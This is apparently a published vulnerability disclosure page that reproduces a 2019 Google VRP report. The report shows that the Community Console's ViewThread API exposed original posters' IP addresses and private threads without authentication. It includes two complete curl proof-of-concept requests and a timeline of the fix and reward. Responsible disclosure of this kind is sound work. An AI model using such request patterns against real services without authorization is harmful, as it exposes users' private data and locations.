Page MenuHomeVulnz

IP address of the original poster in a forum thread revealed by API in the Google Forums Community Console
VerifiedPublic

Description

This is a bug I reported to Google via Google's Vulnerability Rewards Program on Mar 22, 2019.

Below is an intact reproduction of the report sent to Google (I formatted several parts so they are better looking here, I could only send plain text to Google, and I censored some parts):

Description

This is a vulnerability report about a product (the Community Console: https://support.google.com/communities/answer/9026531?hl=en) that is only available to Product Experts (volunteers outside Google who answer questions in the Google Forums and are recognised by Google: https://productexperts.withgoogle.com/) and some Googlers. Therefore, before being able to reproduce the problem, maybe you have to ask authorization to access the Community Console.

Steps to reproduce:

  1. If the API has not changed its behaviour, run the following CURL command which will make a request to the API and will get a forum thread data (there's no need to send any cookies for it to succeed):
curl 'https://support.google.com/s/community/api/ViewThread?authuser=0' -H 'origin: https://support.google.com' -H 'accept-encoding: gzip, deflate, br' -H 'accept-language: en-US,en;q=0.9,es;q=0.8,ca;q=0.7,fr;q=0.6' -H 'user-agent: Mozilla/5.0 (X11; CrOS x86_64 11316.165.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36' -H 'content-type: text/plain; charset=utf-8' -H 'accept: */*' -H 'referer: https://support.google.com/s/community/forum/697265/thread/2517326' -H 'authority: support.google.com' --data-binary '{"1":"697265","2":"2517326","3":{"1":{"2":0},"2":{"1":1},"3":true,"5":true,"10":true,"16":true}}' --compressed
  1. In that obfuscated JSON response, you'll be able to see "83.37.193.225" somewhere in there, the IP address with which I posted the first message of the thread.

If the previous API request didn't work well because the API changed its behaviour, these are the steps to follow:

  1. Open a Chrome tab and open the "Network" tab in the Developer Tools.
  2. Browse to https://support.google.com/s/community/forum/697265/thread/2517326 (again, if you don't have permission to access this page you may be redirected to https://support.google.com).
  3. In the network tab, search for a request called "ViewThread" (https://support.google.com/s/community/api/ViewThread). The response from the server for that petition is the data corresponding to the thread being opened.
  4. You'll be able to see my IP address in there, as I explained before.
  5. If you try to replay that request shown on Chrome by copying the request as CURL and removing all the (authentication) cookies, you'll continue to receive a response with the thread data, so technically if some user outside the Product Experts circle knows of the API endpoint and how it works, they will be able to obtain the IP addresses, and that's why I shared with you the CURL request in the first place, because it is easier to reproduce it that way.

Browser/OS: Chrome OS 72.0.3626.122

Attack scenario

Any of the [REDACTED] Product Experts who have access to the Community Console can take advantage of this vulnerability easily by looking at the response that the API returns when opening a thread, and anyone who is aware of this issue and knows how the API works can exploit it. This could allow people to track the posters in the forum by their IP and also approximately geolocate them.

Although the forums are public (for example https://support.google.com/chrome/community?hl=en), the Community Console is a tool exclusive for Product Experts and Googlers to answer questions faster and better (and I could only see that the vulnerability exists in the Community Console, not on the public forums). With that being said, I would like to observe that if an attacker knew the API endpoint and how it works (maybe because some Product Expert has told them), it would be very easy to make valid requests, because all the threads are public, and this way an attacker would be able to get the ID of each thread and pass it as a parameter to the API request in order to get the IP of the original poster in each thread.

In the worst case scenario, someone could sue Google because you're revealing the IP addresses you collect against what you state in your privacy policy (https://policies.google.com/privacy?hl=en-US#infosharing), because you didn't ask the user for consent to give it to the Product Experts (who are not Google employees), and I don't think it falls under the "legal reasons" category nor the other ones.

Details

Vendor
Google
Product
Community Console
Reported
Mar 22 2019, 12:28 AM
Reward
5000

Event Timeline

avm99963 triaged this task as Priority-1 priority.Mar 22 2019, 12:29 AM
avm99963 created this task.
avm99963 closed this task as Fixed.Apr 22 2019, 11:03 PM

On Mar 23, 2019 2:41AM I sent Google another email detailing another vulnerability I found in the same API:

Hi!

I just discovered you can also use the API to, apart from viewing IP addresses, view private threads (which sometimes include [REDACTED]) without being logged in, if you know the id of the private thread and the forum, and of course also if you know how the API works. Just as an example to repro this, run the following (this thread doesn't contain confidential information):

curl 'https://support.google.com/s/community/api/ViewThread' -H 'origin: https://support.google.com' -H 'accept-encoding: gzip, deflate, br' -H 'accept-language: en-US,en;q=0.9,es;q=0.8,ca;q=0.7,fr;q=0.6' -H 'user-agent: Mozilla/5.0 (X11; CrOS x86_64 11316.165.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36' -H 'content-type: text/plain; charset=utf-8' -H 'accept: */*' -H 'referer: https://support.google.com/s/community/forum/1479660/search/query%3Dforum%253A%25281479660%2B%257C%2B1863597%2529/thread/2115714' -H 'authority: support.google.com' -H 'dnt: 1' --data-binary '{"1":"1479660","2":"2115714","3":{"1":{"2":0},"2":{"1":1},"3":true,"5":true,"10":true,"16":true}}' --compressed

This may be used by [REDACTED] to access threads in those forums, if they know the thread id and forum id. [REDACTED]

Thanks!

On Mar 26, 2019 09:35PM Google acknowledged the report:

Hi,

Nice catch! I've filed a bug based on your report. The panel will evaluate it at the next VRP panel meeting and we'll update you once we've got more information. All you need to do now is wait. If you don't hear back from us in 2-3 weeks or have additional information about the vulnerability, let us know!

Regards,
[REDACTED], Google Security Team

On Apr 9, 2019 06:20PM I received a message with the panel's veredict (along with other information about the reward):

Thank you for reporting this bug. As part of Google's Vulnerability Reward Program, the panel has decided to issue a reward of $5000.00.

I have checked that the vulnerabilities have been fixed, at least as far as I know (so I'm changing this bug status to fixed). Nevertheless, I've just contacted Google to know whether they have really fixed it, and whether I can publish this report.

avm99963 set Reward to 5000.

On Apr 24 2019, 8:39AM Google said:

You should receive a notification when the bug is fixed and verified by us

On Jun 3, 2019 10:47AM Google sent me this message:

It looks like the team is still working on it, but it looks like they're just about done, so I'd imagine you'll get notified of the fix fairly shortly.

avm99963 raised the priority of this task from Priority-1 to Priority-0.Jun 5 2019, 10:09 PM
avm99963 changed Deadline from 90 to 120.Jun 19 2019, 4:52 PM

On Jun 19, 2019 4:23 PM I contacted Google again in order to tell them that 89 days have elapsed since the reporting date and to inquire about whether the fix was already implemented or not.

I've changed the default 90-day deadline to 120 days because otherwise it would be automatically disclosed in a few days.

avm99963 changed the task status from Fixed to Verified.Jan 19 2020, 5:43 PM

On Jun 20, 2019 12:06 AM Google replied:

sorry, this bug was fixed back in March, but our automation didn't send you a notification because we didn't verify it properly, but it was fixed a long time ago.

Also, on Oct 12, 2019 11:36 PM I received this automatic email:

Our systems show that all the bugs we decided to create based on your report have been fixed. Feel free to check and let us know if it looks OK on your end. Thanks for all the help!

Unfortunately, I didn't remember to publish this report after I received this final email, but both parties have verified that the issue is fixed, so I'm changing the status to verified.

I've discovered another vulnerability closely related to this one, so I'll mark this report as blocked by the other report and I'll publish this report when the other can also be published.

The blocking report has been published, so publishing this report too.

avm99963 changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)".Mon, Jul 20, 11:28 PM